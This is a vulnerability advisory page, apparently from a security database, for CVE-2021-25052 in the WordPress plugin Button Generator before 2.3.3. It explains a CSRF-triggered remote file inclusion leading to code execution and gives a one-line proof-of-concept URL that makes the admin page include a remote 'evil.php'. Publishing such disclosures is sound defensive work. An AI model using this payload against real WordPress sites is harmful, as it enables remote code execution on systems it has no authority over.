Lucene search
Krzysztof ZającWPVDB-ID:A01844A0-0C43-4D96-B738-57FE5BFBD67AHistoryDec 05, 2021 - 12:00 a.m.
Button Generator < 2.3.3 - RFI leading to RCE via CSRF
2021-12-0500:00:00
Krzysztof Zając
wpscan.com
14
0.02 Low
EPSS
Percentile
88.9%
The plugin within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.
PoC
http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab;=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP’s allow_url_include must be set to “On”
| CPE | Name | Operator | Version |
|---|---|---|---|
| button-generation | lt | 2.3.3 |
Related
wpexploit
wpexploit
Button Generator < 2.3.3 - RFI leading to RCE via CSRF
2021-12-05 00:00:00
prion
prion
Cross site request forgery (csrf)
2022-01-10 16:15:00
cvelist
cvelist
CVE-2021-25052 Button Generator < 2.3.3 - RFI leading to RCE via CSRF
2022-01-10 15:30:36
patchstack
patchstack
cnvd
cnvd
WordPress Button Generator Plugin File Inclusion Vulnerability
2022-01-14 00:00:00
cve
cve
CVE-2021-25052
2022-01-10 16:15:09
nuclei
nuclei
WordPress Button Generator <2.3.3 - Remote File Inclusion
2022-02-08 01:07:19
nvd
nvd
CVE-2021-25052
2022-01-10 16:15:09